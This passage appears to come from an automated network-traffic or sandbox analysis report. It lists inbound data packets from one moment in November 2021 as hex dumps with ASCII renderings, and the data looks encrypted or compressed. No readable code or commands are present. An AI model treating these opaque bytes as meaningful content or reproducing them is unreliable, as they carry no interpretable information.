                                              2021-11-29 13:25:46 UTC128INData Raw: 08 ba b1 29 86 65 dd 08 bd 17 b0 ca 5c da df f3 8f db 9f 2b d1 53 53 0f f6 e1 9d ad 61 a5 e2 1a b7 31 15 6c be b5 53 66 42 89 a5 0e 3e 8f 76 e3 89 a6 a3 71 3d 3b e4 e6 46 f6 2a 5e ca b7 e1 ae 0d 92 96 9e d3 55 2b 0c dd 35 a1 2a 8a b4 5c c1 a7 25 21 d5 8f 8b 9e e0 ba 75 93 81 f5 3d 15 a7 bc ea e7 39 35 0a 10 03 08 df 7d 68 cb 18 ce 76 00 56 ad 40 f1 5c 08 4e 79 90 e1 f0 26 16 d1 d6 db e3 aa 2f b8 8b f5 51 9d d7 91 72 0d 38 32 75 6e 08 da a0 b0 56 5a b7 91 8f dc 46 ba 76 77 99 2e dd 86 20 58 29 b7 7c 12 14 8d bb 63 f4 a0 de db 38 99 46 42 b6 43 53 db 8f 2f d9 b6 90 95 9f 44 72 cc 3c 1e 13 13 02 36 83 86 0e 80 c3 5f 86 b1 75 d0 dd a9 5e 92 64 bc 80 10 73 8a 0f 75 a0 19 36 a8 ad 77 32 75 4d d3 dc 63 2d 40 57 05 40 f8 90 c6 e0 16 7b 02 80 62 48 2a b3 37 2f 82
                                              Data Ascii: )e\+SSa1lSfB>vq=;F*^U+5*\%!u=95}hvV@\Ny&/Qr82unVZFvw. X)|c8FBCS/Dr<6_u^dsu6w2uMc-@W@{bH*7/
                                              2021-11-29 13:25:46 UTC129INData Raw: ef 62 83 e5 ee d5 4d 4c 25 5b 4a 86 01 2f 9e 2a 2f 8f e0 20 52 b6 63 ce a1 ce 7b e3 c7 82 d2 1a cd 84 04 1e 5e 0d 3b ee 12 57 60 58 81 64 3f cf 60 be 16 82 c1 2e be 58 89 1a 60 12 ed 67 29 7d 02 0b 44 e8 2e ec 71 55 bc ce 67 ab 72 7d 7e a5 78 4b c7 7a 95 23 73 85 8d 0e 27 0d c5 f1 84 6b 72 ae d8 06 86 91 eb f3 0d 1a ea 60 91 e0 3b 1a df 21 e9 f9 80 97 2f 26 b6 04 7b 87 0b 75 c0 e7 bf eb 10 5c f8 f4 2f bb b9 c6 34 ec 26 d6 fc 30 95 24 6a 6c aa 18 82 79 d7 af 63 9d 8b 37 ec ea c3 bd 7d 16 2d 73 d9 8b 94 4d 60 f0 55 dd a0 fa d2 96 96 e9 2d 8d 9b e8 25 ea fb 71 ec 6d 8a a8 12 49 e5 56 b2 ee f6 5d 01 64 d5 97 2b a0 60 10 ff fa 43 bd 72 50 a9 1f 4b 4f 4e f0 cc ff 13 55 04 e4 5c 47 39 ba 33 51 0d 1f ae aa 62 62 ac c5 ce 90 81 8b 0c 43 b7 b0 a2 c9 81 bd ee 28 fb
                                              Data Ascii: bML%[J/*/ Rc{^;W`Xd?`.X`g)}D.qUgr}~xKz#s'kr`;!/&{u\/4&0$jlyc7}-sM`U-%qmIV]d+`CrPKONU\G93QbbC(
                                              2021-11-29 13:25:46 UTC130INData Raw: 03 69 12 fe 6f 67 03 e7 ae ea c0 fe cb 7c fa 7e 17 0b 63 d6 16 8c 01 91 f1 e4 19 11 3a 58 9e af 35 1f e9 4a bb f1 4b 05 1d f0 ea 3d df 7b 30 55 f5 60 17 df fd ea d2 a9 56 89 f7 42 a3 fc 14 e8 51 b7 16 95 79 e7 83 42 51 3f 7b c0 b9 43 fd b8 06 c8 91 b9 1d 7b 97 1e 44 96 76 38 94 aa 73 1e 95 8c 1b b2 c4 ee 66 a7 55 47 d5 4d d6 9a 53 76 b1 07 9f 37 2a 2f af b5 7e 5a b6 79 fd a4 e1 79 e5 eb 2a 2e fd 55 85 00 3a ef a7 3b ee 88 e8 68 64 b6 62 8e 65 60 be 36 db 98 26 be 42 bb 1f 4f 10 eb 4b 81 81 e5 93 45 ec 0a 5e da 55 bc 54 d8 a3 4e 4a 78 17 d3 4b c7 5a c8 46 7b 85 95 38 22 22 c7 f7 a8 c3 8e 49 40 07 82 b5 58 5f 0d 1a 70 df 99 dc 0c 1c 6c 8d e9 f9 a0 c8 42 2e b6 19 4a 82 24 77 c6 cb 17 13 f7 c4 f9 f0 0b 0f 14 c6 34 76 99 de c0 04 93 90 c7 6c aa 38 24 13 df af
                                              Data Ascii: iog|~c:X5JK={0U`VBQyBQ?{C{Dv8sfUGMSv7*/~Zyy*.U:;hdbe`6&BOKE^UTNJxKZF{8""I@X_plB.J$w4vl8$
                                              2021-11-29 13:25:46 UTC131INData Raw: 2a fd 0a c9 6c 9e e5 e0 86 65 c2 b2 b0 17 a0 ec 7a 3d b5 8d 16 fa 04 25 ce 36 d6 09 f3 c2 b9 b2 02 af f0 60 2e 30 09 40 b3 79 53 60 68 7d fe ba 2d a9 52 32 ef 3c 86 7c 8c 17 fb 80 79 4e 06 73 c8 a8 f7 ac a6 ee 0f 99 f9 3b 75 5a dc 35 a5 af c8 03 6b ca 89 cc 3e b2 af 01 7a ea ba 6e a4 8e df 10 11 8d d4 be f8 46 ac 0f 0f 6f b2 2a 50 67 ed 9d 83 7b bd 74 8d 90 ee 53 20 43 79 9b e7 da 53 4b 60 fa d9 e7 b3 6c a4 d0 41 5e bb cc d8 83 b3 3c 32 ef 50 0d e5 84 90 81 70 d9 ef 36 f8 4d be 69 02 26 23 dd 8b 06 41 69 11 c1 8f 15 8d a0 66 0e 8d dc db a4 96 05 2e 09 62 81 df 90 44 63 d9 b6 9a b9 44 3f c4 f9 18 13 15 37 bb d5 32 0d 80 c1 55 3b cf ec d1 47 88 6c ec d8 b9 7e 1f 55 95 43 25 58 1d 36 b7 95 4a 37 5a 4f d5 f0 cf 39 a7 cf 04 44 dc 5b ab 7a 33 cc 29 8b 6f 03 2a
                                              Data Ascii: *lez=%6`.0@yS`h}-R2<|yNs;uZ5k>znFo*Pg{tS CySK`lA^<2Pp6Mi&#Aif.bDcD?72U;Gl~UC%X6J7ZO9D[z3)o*
                                              2021-11-29 13:25:46 UTC132INData Raw: a8 99 cc 4a c7 4b a1 75 e8 ff cf a8 99 77 5b a4 01 4b 9e 2a 2f 35 b0 0a 43 90 59 12 8c cc 7b c5 e9 0e ac 83 d1 ac 2d 3c cf 0b 11 6c f6 eb 4c 49 a3 64 5b cf 60 be ac de eb 3f 98 62 54 37 62 12 cb 46 a5 03 9b 10 6c c1 0c 7e 77 7f 3e 2a db 87 63 5f 7e c1 78 4b c7 c0 cd 09 62 a3 b5 d0 0a 0f c5 d7 a1 e7 0c 37 c3 2e af b3 78 f5 27 98 0e dc bd f1 19 1a bb 21 e9 f9 3a cd 05 37 90 39 a4 aa 09 75 e6 de 33 95 89 47 d0 dd 0d 2f bf ec b6 08 9a fa ed 12 95 48 6a 6c aa a2 21 53 c6 89 5d 4d a6 35 ec cc fe 31 03 8f 35 5b f0 a9 01 4b 4a 72 b1 61 8c eb f0 96 fa e9 2d 8d 21 43 0f fb dd 46 3d 40 88 a8 34 79 69 28 2b f2 de 74 23 f2 d3 bd a9 44 dc 3c ee d8 43 d1 72 50 a9 a5 e1 65 5f d6 fb 2d 3e 57 04 c2 57 cb 47 23 2f 79 24 3d 39 ac 48 e4 48 79 e2 81 a3 8b 60 43 b7 b0 18 7c ab
                                              Data Ascii: JKuw[K*/5CY{-<lLId[`?bT7bFl~w>*c_~xKb7.x'!:79u3G/Hjl!S]M515[KJra-!CF=@4yi(+t#D<CrPe_->WWG#/y$=9HHy`C|
                                              2021-11-29 13:25:46 UTC134INData Raw: 35 03 8d d2 8b 6e 10 18 0c 0f 6d b8 78 2e fe ec 07 a2 76 b4 53 ad 40 74 76 0d 72 5d b0 fc db 4c 68 68 cf cb e7 b5 58 0a 83 da 5f bd e2 7e 2c 2a 3d 32 71 55 3c f6 a2 b0 ca 55 f4 fd 30 fd 5a bf 69 1d 23 2b e0 89 06 58 62 bf 92 14 14 8b 8e c0 a2 14 dd db 3a 93 35 3d 2f 42 c9 fa bd 56 65 b3 a0 9b b9 5b 39 ad c4 1a 13 0c 14 15 86 a9 0c 86 ef f3 96 56 ed d1 d9 8d 5f ff fe 99 37 3a 78 87 45 75 4d 1c 36 a8 92 28 0a 58 4f cc c9 61 6a 3c ce 02 6a 7e f1 32 7b 33 52 2c b9 7c 25 0a 21 17 02 93 18 fb cd d1 f5 a5 e3 42 b9 d1 c0 c9 9f cc e4 63 e5 82 61 11 75 5a d2 76 26 3a 07 cf 21 ef fc 29 d0 0a f3 ec 4e 8d 95 54 93 a3 11 f5 3e 86 9b 94 75 19 37 6e 22 94 c7 a2 3a b9 69 0e 81 20 90 33 61 78 11 5a be bd c6 33 54 fc 32 bd 0c 6f 90 3a 8d ba 50 03 d6 c7 bc d2 b2 9a f1 67 57
                                              Data Ascii: 5nmx.vS@tvr]LhhX_~,*=2qU<U0Zi#+Xb:5=/BVe[9V_7:xEuM6(XOaj<j~2{3R,|%!BcauZv&:!)NT>u7n":i 3axZ3T2o:PgW
                                              2021-11-29 13:25:46 UTC135INData Raw: d2 83 fb 2a 17 98 07 82 b1 58 07 1c 1a 70 5a 98 d9 30 38 4c 27 c3 7f de 71 29 26 b2 39 11 ab 09 75 5c e8 10 87 af 7d ba f1 0f 2f 99 de 26 76 03 e4 fe 3e 98 b2 6a 6a 80 be 7a e7 d6 af 79 95 e5 34 ec ec 73 1a 2e 9d 0a 53 9e aa 01 4d 40 db dd f8 8d f4 d0 9e 2e eb 2d 8b 91 e0 5c 73 fa 66 c0 60 cc a9 14 63 fd 0d 06 fd d0 79 65 f3 d5 97 0b 75 57 3d ee c3 7c 03 5f 52 a9 39 ee ce 30 69 da d7 3a 77 41 e3 76 c5 dd 06 1f 43 2f 1f 7c ab 62 62 16 8e f1 81 a7 b4 bf 6b 9a b2 82 5f ac 3b 90 ab d2 34 03 da 45 ae 51 36 ea f4 22 0c 64 fc 6a 70 13 c1 36 e0 5f 07 be 93 ba 6f f5 da 8b 31 1a 53 2d bf 01 af 2d 64 67 a0 7c 42 b0 c2 d2 12 d1 28 6d ed f1 5a 4e c4 7a eb ef 7d a1 13 19 1e 77 69 2b 04 72 2d 93 9d 32 e6 f7 36 99 54 c4 c4 ac ad 9d 0d bc 68 22 c7 73 02 7d b9 16 5d b5 6f
                                              Data Ascii: *XpZ08L'q)&9u\}/&v>jjzy4s.SM@.-\sf`cyeuW=|_R90i:wAvC/|bbk_;4EQ6"djp6_o1S--dg|B(mZNz}wi+r-26Th"s}]o
                                              2021-11-29 13:25:46 UTC136INData Raw: 9a bf 71 9b 92 4d 1b 13 17 3d 55 aa ab 0c 1a e0 58 f9 e9 cc b9 dc ad 41 de 8b 8c ad 1f 4b bd 4e 57 53 1b 1c 2a cc fb 1b 58 4b f3 b3 48 47 3e 54 21 6d ed a9 8b 13 32 56 0c 86 00 30 0a bb 2c 07 af 3c db d4 fa 77 db 5a 1e a9 d5 e0 b8 b6 e1 e6 f9 c6 85 f6 49 cc 31 d3 72 06 3a 83 da 21 75 c3 2c ef 2e d3 ca 65 0f eb ed f0 b3 15 d5 4a 88 b3 b9 ed 3c 1c 55 86 ca 35 a2 3a bd 69 a6 95 20 90 b3 6c 78 02 7c 98 b6 45 4d cd dd 43 a9 2c 03 8f 12 a0 22 75 28 ed 67 e2 27 b2 9a f5 67 f8 ee 3b cc f1 1f ca 1d c2 0b 82 b6 55 fe c3 ea 61 9b 94 02 6d 32 c2 4a 4a 11 5b ab aa d3 d8 eb fa 68 6b 17 2b 55 d5 3e a1 1c 86 df e3 9d 6f a5 73 18 d5 8c 70 e8 4e 9b cc 6e 28 0f 4c ef 7e cc 5d 10 d2 68 75 17 ff a2 ee fa 84 4b 80 d9 45 27 82 8b c3 d7 cd af fb 78 e3 a3 70 74 12 69 7c bc 01 ee
                                              Data Ascii: qM=UXAKNWS*XKHG>T!m2V0,<wZI1r:!u,.eJ<U5:i lx|EMC,"u(g'g;Uam2JJ[hk+U>ospNn(L~]huKE'xpti|
                                              2021-11-29 13:25:46 UTC138INData Raw: 21 bf 14 63 78 21 03 c2 f4 59 27 d8 53 e9 b2 3b 45 39 ce 53 62 2b 72 ca 8c 12 d6 6e 6e 7f da d7 3e 77 b6 f5 76 c5 58 30 1a 7c 0b 3f 3f 80 e4 1c af e1 e3 85 87 3b 9a 43 b7 2a a7 74 94 9b ce a2 d2 34 07 da c6 b8 51 36 6f d8 27 33 40 dc 2a 5b 95 bf 8f 73 4d 03 9e 1d 98 47 d8 42 ae 1a 22 f3 73 b7 01 af 29 64 ee b6 7c 42 35 e9 d7 2d f5 08 2c c6 77 24 f7 70 68 ef cf f0 84 3b 34 86 52 42 13 a4 2c 26 93 9d 36 e6 63 20 99 54 41 ed a9 92 b9 2d f2 43 a0 b9 ca da 6f bd 36 d1 bb 47 86 86 cc 92 a4 8c 57 1a c5 45 dc f8 4e 35 03 c7 85 c5 81 81 93 ce 46 18 bb b4 87 65 c6 08 01 3b b2 ca c0 d5 98 9c 30 fa 0b 2e ce 36 e9 c1 cc ef bb a9 2c a8 74 1e b1 1b 8b 3a 0a b6 53 64 48 72 da 97 3f 15 57 d1 fe 1a a6 c9 33 1d fb a0 96 7b 2e 5e d7 80 dc 84 20 96 bc 1a 87 a6 54 95 d8 15 33
                                              Data Ascii: !cx!Y'S;E9Sb+rnn>wvX0|??;C*t4Q6o'3@*[sMGB"s)d|B5-,w$ph;4RB,&6c TA-Co6GWEN5Fe;0.6,t:SdHr?W3{.^ T3
                                              2021-11-29 13:25:46 UTC139INData Raw: c3 2c d3 ec 18 94 95 74 ed 9b 3c f7 21 8f 99 3b 09 80 30 44 a4 ca e8 a2 3a bd d3 0a ad 31 b6 89 f2 54 00 7c be c1 de 33 54 c1 6b 80 0e 6f 88 38 22 c6 c9 04 fc 45 e2 fc b2 9a f5 dd 50 d6 2a ea ca 80 e6 1f c2 2d cc 29 2b 67 d5 c2 48 b9 f9 05 47 b0 26 f6 66 03 79 ab 7f d3 d8 eb 40 df 53 06 0d 6a 66 17 8c 1e a6 bc d0 1b 11 20 5a 35 d3 ac 18 c3 cc e5 cf 4a 05 19 4a 76 11 cd 5d 8a d7 d8 71 31 df 04 e3 d2 a9 69 eb c6 6f a1 e1 3a ef d5 c9 89 be fb 9d 3a eb 51 3b 5b e0 9d 6e ef 04 03 4d 80 9f 3d e1 df 16 44 b6 1b 31 bc 87 6d 36 be a4 99 ca 77 6d 18 3a 74 ee d1 6d 6d 01 76 5b 3a 04 92 8f 0c 0f 14 94 27 52 96 01 ff 8c cc 66 cd c0 02 ac 85 e6 02 7e a7 ce 0d 3f ce 34 73 4d 49 3d 61 83 dd 46 9e 8a fa c6 2e 9e 3d b8 37 62 0d f3 65 86 01 9b 0c 6e 6e 70 e7 70 55 b8 74 ff
                                              Data Ascii: ,t<!;0D:1T|3Tko8"EP*-)+gHG&fy@Sjf Z5JJv]q1io::Q;[nM=D1m6wm:tmmv[:'Rf~?4sMI=aF.=7bennppUt
                                              2021-11-29 13:25:46 UTC140INData Raw: 26 00 8f 0e 5f 20 a1 6b 6a 07 e5 ff 06 dd 8a 54 75 f0 5a 6a 51 b5 ea ef 62 1f 1e 19 0d 51 4f dc 83 0c b4 b2 b5 2d c6 bf 2f b1 79 5c e1 87 95 3d 53 6d 68 22 c3 73 05 6e b9 16 d8 9f 6a 94 3a c9 61 b4 aa 77 a9 ee 5e dc d8 b9 29 2b ea 9e ed aa a9 15 b6 f5 9b c5 29 a6 ba c3 28 95 a0 97 e7 48 d6 95 52 17 da 9f 0f fb 2d c9 2a c4 ff 93 9f 06 85 70 34 31 4f 90 45 93 b3 73 80 69 e7 db 0d 1a a2 60 da cf dc 87 5c 32 3d be 9b 66 6c 31 7d e2 85 f3 86 26 ba 14 e6 60 3e 55 91 fc d4 a4 35 ed b4 5c c1 b8 25 1e 53 ae 21 9a c0 d2 75 bb ac ee 15 3e 8f d2 92 54 ba 4b 97 0e 6b 96 da b2 66 ed 07 3c 73 82 43 8b 60 0c 52 20 63 5b fb fc da 4c 75 60 fa d9 e7 b3 6c a4 d0 41 5e bb cc d8 b1 b2 3c 32 ef 50 0d e5 84 90 b3 71 d9 ef 36 af 5d be 69 02 16 23 dd 8b 06 41 69 11 c1 8f 15 8d a0
                                              Data Ascii: &_ kjTuZjQbQO-/y\=Smh"snj:aw^)+)(HR-*p41OEsi`\2=fl1}&`>U5\%S!u>TKkf<sC`R c[Lu`lA^<2Pq6]i#Ai
                                              2021-11-29 13:25:46 UTC141INData Raw: 4a de 36 56 02 86 d9 d5 33 3c 3e 72 1e fb 2a 60 70 4f 9b 52 6b 01 1f 6a cf 8a e8 70 02 d4 d5 64 15 ff bd c2 32 b5 49 80 c0 64 89 d1 10 c2 d1 e3 0d ea e0 e2 a3 ee 71 3a 79 5a 9c f4 ca b3 37 46 b1 bc 1f 5b de 36 af 8a 69 28 a7 af 5c 1c 93 a0 b3 4a 23 76 67 a3 71 ce d3 4f d6 00 ec 7e 8d 33 99 be 2c 2d af 95 07 a2 aa 79 e6 93 c0 53 c8 ef 00 aa a9 4a fa 99 3f cf 09 1b e9 8a 72 4d d3 82 69 bc e9 40 b9 34 fb c6 0e 42 5e a1 37 7d 04 c3 60 a9 03 9d 20 c6 92 97 7f 71 51 9c 5c 40 86 63 c1 7b 1a 69 6d e7 52 ea 24 73 a5 87 3b 0a 0f db df 83 eb 0c 31 f3 80 fc 28 79 f3 09 3a 79 47 bc f1 87 1f 61 33 cf d9 a9 ea 28 26 96 03 4e aa 09 6a cd e5 10 97 89 5b d2 76 71 b6 b8 c6 30 56 09 f9 ed 16 2f 95 47 7e 8c 18 0e 7c d7 af 5d 90 bb 35 ec f3 e5 17 2e 8d 2c 75 f7 2d 7f d4 61 f0
                                              Data Ascii: J6V3<>r*`pORkjpd2Idq:yZ7F[6i(\J#vgqO~3,-ySJ?rMi@4B^7}` qQ\@c{imR$s;1(y:yGa3(&Nj[vq0V/G~|]5.,u-a
                                              2021-11-29 13:25:46 UTC143INData Raw: 2f a8 3b c8 b9 0f e4 34 c9 2a fb 0f a4 b2 04 9a 2e 36 9a 33 09 42 b9 31 2d f9 69 e7 df b7 14 8d 72 fc 75 19 ab 4e 14 3d d0 82 66 6c 0e 66 ea a8 f1 99 78 b8 bb 9a f9 39 7f 17 a2 ac a4 35 e9 0e 55 ee a9 03 a4 97 82 30 bc c0 96 6c bb ac d7 ad 33 8d d2 8f 56 15 37 0e 09 41 14 84 c9 66 ed 03 86 7b ad 52 ad da cb 7e 32 45 5b bd e5 da 4c 48 dd f7 db e7 aa 4b 0a 83 da 5f bd e2 7e 2c 2a 3d 32 71 55 0e f5 a2 b0 ca 55 f4 fd 30 fd 68 bc 69 1d 23 a9 d0 89 06 58 4e bf 92 14 14 8b 8e c0 a2 14 dd db 3a 93 07 3e 2f 42 c9 fa bd 56 65 b3 92 98 b9 5b 39 43 f4 1a 13 0c 10 15 86 a9 0c 86 ef f3 96 56 ed d1 d9 8d 71 fc fe 99 37 3a 78 87 45 75 63 1f 36 a8 92 de 3a 58 4f cc d7 61 6a 3c ce 02 6a 7a f1 32 7b 33 52 2c 97 7f 25 0a 21 17 02 90 18 fb e3 d2 f5 a5 e3 d6 89 d1 c0 cd bc c9
                                              Data Ascii: /;4*.63B1-iruN=flfx95U0l3V7Af{R~2E[LHK_~,*=2qUU0hi#XN:>/BVe[9CVq7:xEuc6:XOaj<jz2{3R,%!
                                              2021-11-29 13:25:46 UTC144INData Raw: 9e 2e 0f fe 97 27 52 2c 5c cb 9e ea 5b b4 ef 00 ac a3 35 a6 00 3e d0 06 13 c3 8a 72 4b 63 21 3a 37 ce 60 ba 16 a9 c4 2e be d8 84 1a 70 34 cb 1f a9 03 9b 2a 40 cf 0e 7e 6e 4f 94 79 40 86 65 71 d8 49 e1 4a c7 5e c8 77 71 85 95 bc 2f 22 d7 d1 8e ba 0e 37 d9 26 9c 92 78 f3 12 02 58 68 be f1 1b 10 ca 5f 70 f8 a0 ec 08 72 b4 19 53 30 2c 58 d4 eb 1d c1 8b 5d f8 d0 39 0c b9 c6 2b 62 2b d6 ef 16 b3 9a e8 12 33 39 04 7a f7 fa 7f b5 a6 af c9 c1 f8 19 23 da 2e 73 dd 8b 4b 6e 60 f0 d1 d0 a0 e9 f4 b0 29 6f 53 14 ba 66 26 ca ad 64 c4 40 12 8d 39 71 41 08 7d ed f6 59 01 a0 f6 97 2b 25 5d 15 c3 de 63 2d 58 d6 d7 a6 c5 48 4a d0 8c d5 3e 57 9e c7 5b d7 61 03 65 53 09 3f 19 c0 41 62 36 ff f3 a9 8a a9 9b 45 9d 36 fc c0 87 bd ea 12 8b 36 07 fa 99 8a 7c 24 56 f1 57 1c 42 dc 0c
                                              Data Ascii: .'R,\[5>rKc!:7`.p4*@~nOy@eqIJ^wq/"7&xXh_prS0,X]9+b+39z#.sKn`)oSf&d@9qA}Y+%]c-XHJ>W[aeS?Ab6E66|$VWB
                                              2021-11-29 13:25:46 UTC145INData Raw: 7e 82 50 ad 46 c4 d5 5e fa 7a 90 e3 fa 34 6a 48 d7 41 c2 98 54 04 8e a0 5d bb c8 d8 6e 96 3c 32 6a 54 08 da a0 b0 56 5a 5f 91 8f dc 46 ba 49 64 01 0b f0 13 23 6a 51 b1 9f 6f 16 8d a4 66 81 a8 dc db 21 ba 00 11 2d 42 55 f5 16 3a da 92 bd 9e 99 21 1b ec d4 80 36 3e 0f 1b 8b d1 0e 80 c5 55 8e ea ec d1 c2 8c 69 d3 fc 99 ab 35 d3 eb fa 54 53 19 16 d3 b0 62 1a c2 6a fe c8 6f 67 45 cc 04 40 dc 08 8e 7a 33 49 24 8e 50 27 0a bd 18 ad fc a7 da d2 d4 d5 d9 c1 1f a9 4b e5 ff a6 c7 c6 1f e1 a8 e7 4f 43 7e d2 72 11 32 2b cd 21 73 f3 86 bc b5 d2 cc 4b ad e8 76 f1 b3 8b d0 0c 98 95 99 0a 1b 31 44 80 5a 7b a3 3a aa 61 02 82 20 96 83 c2 2b 99 7d 9e 98 e7 4d 56 dc 43 37 29 42 9c 34 80 c6 52 05 fc 61 73 6e b3 9a ea 48 5d d6 39 cc ec 1d 61 61 5b 0c a8 34 0b 18 c0 ea 65 21 dc
                                              Data Ascii: ~PF^z4jHAT]n<2jTVZ_FId#jQof!-BU:!6>Ui5TSbjogE@z3I$P'KOC~r2+!sKv1DZ{:a +}MVC7)B4RasnH]9aa[4e!
                                              2021-11-29 13:25:46 UTC146INData Raw: 94 ca 5a ef a3 a5 3b d8 9f 29 e4 b0 b7 b3 da ef bf 92 8a 87 76 1e 2d 14 24 56 b5 97 dd 62 68 e7 fb 35 19 8f 72 e3 fa 14 ab 5e 32 1b d1 02 18 f5 2f 5e ce 88 7e 84 20 90 0c bd d4 2e 73 b5 53 37 a5 35 cd 99 5f ec a9 14 16 9f ad 21 9c ca 38 10 22 ad f7 39 33 1d d0 94 7e a2 10 23 1e 4d b2 6a 52 67 ed 27 1e 70 af 52 b5 68 c3 51 20 65 51 12 99 43 4d 68 4c f7 4a e5 b5 46 b8 8b f5 4e 9d e8 69 50 b3 3c 12 cf 53 20 f7 b5 98 7d 72 d9 e9 3c 5f 38 27 68 1d 07 2b 62 8b 06 47 d9 b2 92 07 32 ad 36 44 dc 8d fc 60 18 b3 28 24 07 6f 51 df 96 6e c1 ed 24 9b b9 5f 39 7f d6 1a 13 89 38 10 ba 8d 2c 13 c7 75 e8 ef 51 f7 dd ad 56 d6 d3 9b ad 19 7f 17 1d cc 52 1d 32 88 26 60 1a 58 d5 f6 f7 58 61 1e 5a 06 40 fc af 15 5c 33 56 14 8e 50 27 0a bd 18 ad fc a7 da d2 d4 d5 30 c1 1f a9 4b
                                              Data Ascii: Z;)v-$Vbh5r^2/^~ .sS75_!8"93~#MjRg'pRhQ eQCMhLJFNiP<S }r<_8'h+bG26D`($oQn$_98,uQVR2&`XXaZ@\3VP'0K
                                              2021-11-29 13:25:46 UTC147INData Raw: 76 a2 21 b9 b4 a8 51 36 94 27 56 96 cc e4 8c cc e1 c0 c0 11 8a a3 79 86 00 3e ef e9 1c ee 88 6b 65 64 a5 44 a8 e5 e2 c0 af fa c6 2a 9e f4 a3 37 62 88 ce 60 ba 25 bb bc 46 ec 0e 5e 96 72 bc 54 5b ae 4e 59 5e 31 52 cd b9 c3 e9 24 77 a5 22 24 0a 0f 5f d2 83 fb 2a 17 6e 04 82 b1 58 19 2a 1a 70 5a b5 d9 30 38 4c 27 c3 7b de 71 29 26 b2 39 eb a8 09 75 5c e8 10 84 af 7d 40 f2 0f 2f 99 35 13 76 03 e5 c5 3b b7 b0 6c 46 2c 46 9d 7f d7 ab 5d 0c a4 35 ec 76 cc 12 11 a9 0c ca df ab 01 6d 9b d7 cf f8 92 e7 dc 9b 01 e9 2b a7 3d 18 bb eb fb 62 e4 fa 8a a8 14 f9 42 05 39 c9 d6 e3 23 f2 d5 b7 2c 12 45 3d f1 d5 4b 06 70 50 af 15 42 36 d7 f1 db d3 1e ec 06 e2 76 5f 62 0e 20 77 29 84 3b aa 62 42 26 c8 e3 81 b8 a4 b3 6e b5 b0 84 73 00 c3 77 33 d3 30 27 46 01 af 51 ac 55 fc 1d
                                              Data Ascii: v!Q6'Vy>kedD*7b`%F^rT[NY^1R$w"$_*nX*pZ08L'{q)&9u\}@/5v;lF,F]5vm+=bB9#,E=KpPB6v_b w);bB&nsw30'FQU
                                              2021-11-29 13:25:46 UTC148INData Raw: 67 cd 1a 8d 56 af 4d a7 68 c3 51 20 65 51 16 99 43 4d 68 4c f7 07 e5 b5 46 b8 8b f5 4d 9d e8 24 50 b3 3c 12 52 5e 20 f7 bd 94 78 5d db ef 10 f7 c0 c0 f0 1c 03 0f d0 54 04 47 43 0d 9a 3b 06 ab 84 9b de 8d dc fb 75 98 28 3c 30 4b 7b f2 92 44 45 b9 3b e4 20 5a 19 e8 f4 c4 11 13 1d a7 8e 86 1e a6 e5 ab ea cf ec f1 89 86 41 fe e1 92 85 32 57 95 65 7f d5 63 af a9 b2 66 3a 87 4d d3 da d3 62 13 dc 22 60 23 8d ab 7a 13 09 27 a6 7d 3a 05 93 1f 2d 82 38 f1 54 ae 6c a4 c3 1b 89 31 c2 d2 b7 7b c3 4e f1 8e c7 8f ee 5b d2 52 68 31 06 cf 3e 79 f1 29 c0 2c d5 e6 c9 f3 0c 75 f1 b7 31 14 23 89 b3 23 52 34 23 62 80 0b 5c a3 3a 9d 33 04 80 20 8f 8d 6c 78 02 7c 98 b6 45 4d cd dd 43 a9 2c 8d 8c 12 a0 22 75 28 ed 67 e2 a9 b1 9a f5 67 eb d0 3b cc f2 1f ca 1d c2 0b 82 b2 55 fe c3
                                              Data Ascii: gVMhQ eQCMhLFM$P<R^ x]TGC;u(<0K{DE; ZA2Wecf:Mb"`#z'}:-8Tl1{N[Rh1>y),u1##R4#b\:3 lx|EMC,"u(gg;U
                                              2021-11-29 13:25:46 UTC150INData Raw: 68 ad d7 3d 38 4f 21 e9 d9 bf c5 28 26 a8 31 7e a8 09 73 ec 4b 43 0c 88 5d fc d0 0c 2c b9 c6 ae 53 2e e9 cb 36 b6 b3 6a 6c 8a 1f 29 7e d7 b0 6c 9d 8b 37 ec ea c3 b9 7d 16 2d 73 d9 8b 05 4e 60 f0 55 dd a0 f9 d2 96 07 ea 2d 8d 9b 5e 0f ea fb 79 d5 68 a5 aa 14 65 4d ae 55 76 f7 59 25 d2 d0 94 2b 3a df 18 c3 ce 45 0b 77 53 a9 3f e4 01 63 f0 db c8 31 7f 29 e0 76 c3 6d a5 4c c8 08 3f 3d 8a 64 61 36 e0 79 a4 8a b9 bd 63 b1 b3 82 59 a6 e5 c3 32 d3 2b 08 d2 2e ad 51 30 5a 53 71 87 43 dc 28 51 14 c2 16 72 d7 22 93 9d bf 67 df db 8b 37 10 b2 7e 26 00 b1 01 69 22 a1 7a 68 a8 99 66 01 f7 0c 0a e4 f2 5a 6e eb 4d c6 fe 44 a5 33 37 1c 77 4f 6e af 0c b4 8e b5 1b c4 bf 31 b3 d2 20 78 80 bf bf 0d fd 6a 22 c7 c9 fe 42 ab 30 62 b3 44 86 1c c9 ca 98 aa 77 96 f6 6d f1 da a6 24
                                              Data Ascii: h=8O!(&1~sKC],S.6jl)~l7}-sN`U-^yheMUvY%+:EwS?c1)vmL?=da6ycY2+.Q0ZSqC(Qr"g7~&i"zhfZnMD37wOn1 xj"B0bDwm$
                                              2021-11-29 13:25:46 UTC151INData Raw: 13 57 b0 4c 6c 2e 59 54 6f ca 76 32 12 27 d6 c3 1c db c2 c5 88 a0 31 2e e0 99 c4 d7 46 4c c9 db 9b 6b e3 f3 5b 30 34 f4 a2 d6 93 49 d1 92 ab 19 bb 97 28 82 60 63 7f 40 18 64 a6 15 66 70 63 4d a1 bd 2e ad a9 a4 2c a6 57 85 3f 57 77 6d a0 48 10 cc 54 8f 7f 80 cc 1a cb cb 28 fe b9 09 a9 60 ee d4 8f 32 78 59 3c c8 90 29 8c 53 cf 23 47 de 67 df d8 30 2e 25 40 ce c3 fb 47 21 e5 2d c0 60 7c c5 32 81 ec 52 04 ab 50 d2 7e a1 99 e0 03 5e e0 2d d1 a9 69 db 0c d2 0f ae 34 3f 63 95 d0 71 9c d7 71 04 33 44 65 5f 2d 52 85 e7 f9 fa 95 bf e3 75 1a 48 34 d3 0b 9c 76 f5 c0 c8 6d 07 0c 43 c0 1f 77 c4 7d c1 79 9e 9e 86 9d 99 0c d4 06 8e cf 3b 28 bd 88 15 72 3a 12 3a b7 50 04 bd 2f 69 d7 1a 19 35 6d 77 bb 0f 4c 0c a4 d0 94 b3 6b 9f 14 69 d2 aa 60 40 f5 b1 2d f7 b1 5b b2 d6 4b
